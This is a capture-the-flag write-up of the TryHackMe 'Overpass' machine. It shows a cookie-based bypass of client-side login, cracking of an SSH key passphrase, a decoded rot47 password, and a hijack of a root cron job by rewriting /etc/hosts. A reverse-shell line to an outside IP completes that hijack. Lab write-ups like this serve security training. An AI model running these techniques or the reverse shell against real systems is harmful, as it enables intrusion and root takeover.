First in a series of three machines on TryHackMe.
What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!
Goal
Hack the machine and get the flags in user.txt and root.txt
Initial recon
Presented with a machine that appears to be running a web server, describing a piece of password management software.
Running nmap
1
nmap -sV -sV -oN
Reveals that this system is currently running an SSH and an HTTP server.
1
2
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
Looking at the website further, I see that the software is available for download as a number of pre-compiled binaries, as a well as a link to the source code, aswell as a build script. Looks like the software is written in Go.
Inspecting the source for the homepage, we also find this comment.
1
2
3
4
5
6
<p>
Overpass allows you to securely store different passwords for every service,
protected using military grade
<!--Yeah right, just because the Romans used it doesn't make it military grade, change this?-->
cryptography to keep you safe.
</p>
This comment suggests that we are probably looking at a Caesar cipher.
Taking a peek at the code confirms this, as we see that it encrypts passwords using a rot47 function. We also see this interesting line in the automated build script.
1
echo "$(date -R) Builds completed" >> /root/buildStatus
The build script must be running as root. Maybe we can mess about with the date binary?
Further investigating the website, we enumerate the following locations with Gobuster
- /img
- /downloads
- /aboutus
- /admin
- /css
Checking the “/admin” route out, we’re presented with an admin/password login.
Weak client side authentication
Taking a look at login.js, we see this is very weakly secured with some clientside JS.
1
2
3
4
5
6
7
8
9
10
...
if (statusOrCookie === "Incorrect credentials") {
loginStatus.textContent = "Incorrect Credentials"
passwordBox.value=""
} else {
Cookies.set("SessionToken",statusOrCookie)
window.location = "/admin"
}
}
...
Setting the SessionToken value in our cookie to any value and refreshing the page gets us access, and we’re presented with an RSA Private key and a possible user name of “James”. We already know that the server is running SSH, so this might be our way in, but we also are told that this key is secured with a password, which we’ll need to break.
Cracking the private key
We convert the private key we were given into a suitable format using “ssh2john.py”, followed by throwing rockyou.txt at it with johntheripper. This pretty quickly gives us the password james13.
Logging in via SSH with these credentials we get our first flag in user.txt.
We also get a todo.txt which mentions that james has recorded his password using the overpass password manager. Sure enough, looking for a .overpass file reveals some ciphertext. We could just use the overpass software, but we know its just rot47, so we can just slap it into an online tool. This gives us another credential, which is james’ user password.
1
{"name":"System","pass":"saydrawnlyingpicture"}
PrivEsc
Running linpeas.sh to check for PE vectors reveals a few things
- etc/hosts is writable by all users.
- We see there is a cron job running every minute as root, running a buildscript.sh file.
1
2
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
We see that the system is downloading the latest version of the build script and piping it directly into bash. As we can write to the etc/hosts file, we can simply change the location of overpass.thm and point it to our own malicious code.
Getting root
I used updog to spin up a local webserver on port 80, and placed a reverse shell script at the location of the build script.
1
2
# buildscript.sh
sh -i >& /dev/tcp/10.18.10.136/9999 0>&1
After waiting a minute for the cron job to run. I had a root shell and the final flag.